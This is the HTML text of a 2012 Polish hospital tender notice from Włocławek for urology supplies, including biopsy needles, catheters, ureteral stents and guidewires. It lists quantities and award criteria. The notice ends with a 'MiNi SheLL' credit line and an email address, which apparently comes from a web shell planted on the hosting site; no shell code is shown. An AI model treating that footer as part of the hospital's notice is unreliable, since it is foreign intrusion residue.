b.w przypadku jeśli produkty będące przedmiotem umowy zostaną wycofane przez producenta z  produkcji lub z innych przyczyn niezależnych od Wykonawcy ich dostarczenie nie będzie możliwe w terminie określonym w umowie (np. produkt na specjalne zamówienie, przejściowe problemy produkcyjne) i Wykonawca po pisemnym zawiadomieniu Zamawiającego o fakcie, może  zaproponować produkty zamienne o nie gorszych cechach jakościowych i cenie nie wyższej niż ceny 
określonej w umowie,
c. w przypadku obniżenia ceny przez producenta lub Sprzedającego,

2. Zamawiający przewiduje również zgodnie z art. 144 ustawy Prawo zamówień publicznych  możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do   treści oferty,  na podstawie której dokonano wyboru Wykonawcy (w formie aneksu), w przypadku  wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków   ich wprowadzenia: 
a. zmiany spowodowane siłą wyższą uniemożliwiającą wykonanie przedmiotu umowy;   
b.ustawowa zmiana obowiązującej stawki podatku od towarów i usług (VAT).
    
 Wszystkie powyższe postanowienia w podpunktach stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.szpital.wloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wojewódzki ,  ul. Wieniecka 49, 87-800 Włocławek , pokój 303 (budynek  administracji, pokój 303).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2012 godzina 10:00, miejsce: Szpital Wojewódzki ,  ul. Wieniecka 49, 87-800 Włocławek 
 pokój 303 (budynek  administracji, pokój 303).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1   IGŁY DO BIOPSJI STERCZA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Nazwa asortymentu	rozmiar	j.m.	Zamawiana ilość
Na 2 lata
A	Igły do biopsji stercza do aparatu Magnum BARD, sterylne pakowane pojedynczo	18G x  dł. 25 cm	Szt.	720.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.50.00-2, 33.14.12.00-2, 33.14.12.40-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2   CEWNIKI  UROLOGICZNE TYPU COUVELAIRE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Nazwa asortymentu	rozmiar	j.m.	Zamawiana ilość
Na 2 lata
A	Cewniki urologiczne typu COUVELAIRE, jednorazowe, jałowe, pakowane pojedynczo	10 Ch x dł. 400 mm	Szt.	312
B	Cewniki urologiczne typu COUVELAIRE, jednorazowe, jałowe, pakowane pojedynczo	12 Ch x dł. 400 mm	Szt.	312
C	Cewniki urologiczne typu COUVELAIRE, jednorazowe, jałowe, pakowane pojedynczo	14 Ch x dł. 400 mm	Szt.	312
D	Cewniki urologiczne typu COUVELAIRE, jednorazowe, jałowe, pakowane pojedynczo	16 Ch x dł. 400 mm	Szt.	192
E	Cewniki urologiczne typu COUVELAIRE, jednorazowe, jałowe, pakowane pojedynczo	18 Ch x dł. 400 mm	Szt.	192.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.50.00-2, 33.14.12.00-2, 33.14.12.40-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3   CEWNIKI  UROLOGICZNE TYPU TIEMANN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Nazwa asortymentu	rozmiar	j.m.	Zamawiana ilość
Na 2 lata
A	Cewniki urologiczne typu TIEMANN, jednorazowe, jałowe, pakowane pojedynczo	10 Ch x dł. 400 mm	Szt.	24
B	Cewniki urologiczne typu TIEMANN, jednorazowe, jałowe, pakowane pojedynczo	12 Ch x dł. 400 mm	Szt.	24
C	Cewniki urologiczne typu TIEMANN, jednorazowe, jałowe, pakowane pojedynczo	14 Ch x dł. 400 mm	Szt.	24
D	Cewniki urologiczne typu TIEMANN, jednorazowe, jałowe, pakowane pojedynczo	16 Ch x dł. 400 mm	Szt.	24
E	Cewniki urologiczne typu TIEMANN, jednorazowe, jałowe, pakowane pojedynczo	18 Ch x dł. 400 mm	Szt.	24.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.50.00-2, 33.14.12.00-2, 33.14.12.40-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4  ŁĄCZNIK DWUBIEŻNY TYPU  LS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Nazwa asortymentu	rozmiar	j.m.	Zamawiana ilość
Na 2 lata
A	Łącznik dwubieżny typu LS - Luer Lock, sterylny, pakowany pojedynczo		Szt.	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.50.00-2, 33.14.12.00-2, 33.14.12.40-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5  ZESTAW PODSTAWOWY DO NADŁONOWEGO DRENAŻU PĘCHERZA MOCZOWEGO Z CEWNIKIEM  WYKONANYM  PUR.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Nazwa asortymentu	rozmiar	j.m.	Zamawiana ilość
Na 2 lata
A	Zestaw A:
- igła 3,6 mm rozrywalna,
- długość igły 120 mm,
- cewnik 10 Ch ( tzn. pigtail),
- długość cewnika 650 mm
- znacznik na długości 90/130/190 mm	10 Ch	Szt.	80
B	Zestaw B:
- igła 5,6 mm rozrywalna,
- długość igły  120 mm,
- cewnik 15 Ch ( tzn. pigtail) 
- długość cewnika  650 mm
- znacznik na długości 130/280 mm	15 Ch	Szt.	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.50.00-2, 33.14.12.00-2, 33.14.12.40-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadane 6  ZESTAW MOCZOWODOWY TYPU DOUBLE PIGTAIL.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Nazwa asortymentu	rozmiar
(Długość  między pętlami)	j.m.	Zamawiana ilość
Na 2 lata
A	Zestaw moczowodowy typu Double Pigtail
 średnica 6 Ch
Parametry graniczne
- cewnik wykonany z poliuretanu, zakończony od strony pęcherzowej śródosiowym klikiem, kompatybilnym z popychaczem,
- znaczniki co 1 cm wokół całej średnicy,
- prowadnik z pokryciem PTFE z elastyczną końcówką z funkcja zmiękczania,
- popychacz o dł. około 45 cm, zacisk,
- popychacz załączony do zestawu wyposażony w śródosiowy klik i funkcję sterowania ułożeniem cewnika poprzez jego przesuwanie przód - tył i obracanie,
- zakończenie cewnika otwarte - zamknięte	
24 cm	
Szt.	
48
		

26 cm	

Szt.	

48
		

28 cm	

Szt.	

48
				
B
	Zestaw moczowodowy typu Double Pigtail 
do zastosowania z uretrorenoskopem
średnica 4,5 - 4,8 Ch
Parametry graniczne
- cewnik wykonany z poliuretanu
- znaczniki co 1 cm wokół całej średnicy,
- prowadnik o śr. 0,028 z pokryciem PTFE z elastyczną końcówką z funkcją  zmiękczania, dł 150 cm
- popychacz o dł. min. 80 cm, 
- popychacz załączony do zestawu wyposażony w śródosiowy klik i funkcję sterowania ułożeniem cewnika poprzez jego przesuwanie przód - tył i obracanie przy dł. 26-28 cm,
- zakończenie cewnika otwarte - zamknięte	

22 cm	

Szt.	

48
		
24 cm
	

Szt.	
48
		
26 cm
	

Szt.	

48
		28 cm	Szt.	48
				
C	Zestaw moczowodowy typu Double Pigtail do zastosowania z uretrorenoskopem 
średnica 4,8 Ch
Parametry graniczne
- cewnik wykonany z materiału innego niż  poliuretan, z wewnętrzną warstwa utwardzaną,
- przepływ wewnętrzny cewnika min. 0,035,
- znaczniki wokół całej średnicy co 5 cm,
- prowadnik o śr. 0,035 z pokryciem PTFE z elastyczną końcówką dł 150 cm
- popychacz o dł. min. 70 cm, 
- popychacz załączony do zestawu wyposażony w zacisk  i funkcję sterowania ułożeniem cewnika poprzez jego przesuwanie przód - tył i obracanie możliwość repozycji nawet po wyjęciu prowadnicy,
- zakończenie cewnika otwarte -zamknięte	22 cm	Szt.	24.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.50.00-2, 33.14.12.00-2, 33.14.12.40-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadane 7   DRUT PROWADZĄCY PROSTY ZE STALI CHIRURGICZNEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Nazwa asortymentu	rozmiar	j.m.	Zamawiana ilość
Na 2 lata
A	Drut prowadzący prosty ze stali chirurgicznej 
typu GUIDE
Parametry graniczne
- pokryty PTFE do URS,
- o średnicy 0,028 (0,71m )
- f. ch 5+6
- z funkcją zmiękczania 
- dlugość 150 cm
- drut w plastikowym dyspenserze,
- jednorazowa , sterylna pojedynczo pakowana		Szt.	432.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.50.00-2, 33.14.12.00-2, 33.14.12.40-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadane 8  CEWNIK OPERACYJNY TYPU COUVELIERE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Nazwa asortymentu	rozmiar	j.m.	Zamawiana ilość
Na 2 lata
A	Cewnik operacyjny typu COUVELIERE

Parametry graniczne
- trójdrożny, 
- z linią RTG  na całej długości
- wykonany z medycznego PCV
- przezroczysty,
- balon 30 ml	16Ch	Szt.	20
		18Ch	Szt.	40
		20Ch	Szt.	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.50.00-2, 33.14.12.00-2, 33.14.12.40-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie 9  CEWNIK POOPERACYJNY TYPU DUFOUR.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Nazwa asortymentu	rozmiar	j.m.	Zamawiana ilość
Na 2 lata
A	Cewnik pooperacyjny typu DUFOUR

Parametry graniczne
- z czerwonej gumy,
- typu Robusta
- pokryty lateksem
- dwudrożny
- 2 oczka na przemian ległe
- balon 50 ml
- długość około 40 cm	16Ch	Szt.	40
		18Ch	Szt.	40
		20Ch	Szt.	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.50.00-2, 33.12.12.00-2, 33.14.12.40-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. JAKOŚĆ - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie 10 CEWNIK POOPERACYJNY TYPU DUFOUR.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Nazwa asortymentu	rozmiar	j.m.	Zamawiana ilość
Na 2 lata
A	Cewnik pooperacyjny typu DUFOUR

Parametry graniczne
- z czerwonej gumy,
- typu Robusta
- pokryty lateksem
- trójdrożny
- 2 oczka na przemian ległe
- balon 50 ml
- długość około 40 cm	16Ch	Szt.	20
		18Ch	Szt.	20
		20Ch	Szt.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.50.00-2, 33.14.12.00-2, 33.14.12.40-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie 11 CEWNIK POOPERACYJNY TYPU TIEMANN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Nazwa asortymentu	rozmiar	j.m.	Zamawiana ilość
Na 2 lata
A	Cewnik pooperacyjny typu TIEMANN
Parametry graniczne
- z czerwonej gumy
- typ Robusta
- pokryty lateksem
- dwudrożny
- 1 oczko
- balon 30-50 ml
- długość ok. 40 cm	14 Ch	Szt.	20
		16Ch	Szt.	20
		18Ch	Szt.	20
		20Ch	Szt.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.50.00-2, 33.14.12.00-2, 33.14.12.40-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie 12 Zestaw do PLNC.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Nazwa asortymentu	rozmiar	j.m.	Zamawiana ilość
Na 2 lata
A	Igła trzyczęściowa
Parametry graniczne
- zakończona szlifem w postaci trzech pierścieni widocznych w USG
- minimalny przepływ do aplikacji prowadnicy o średnicy 0,038
- kompatybilna z drutem określonym w poz. B	
17,5 G 
dł.  20cm	
Szt.	
192
B	Drut prowadzący 0,038 typ Linderquist
Parametry graniczne
- usztywniana
- zakończenie J bezpieczne zmiękczone
- pokryty PTFE
- długość do wyboru 80 cm, 100 cm, 120 cm
- kompatybilny z igłą trzyczęściową określoną w poz. A		
Szt.	
192.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.50.00-2, 33.14.12.00-2, 33.14.12.40-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com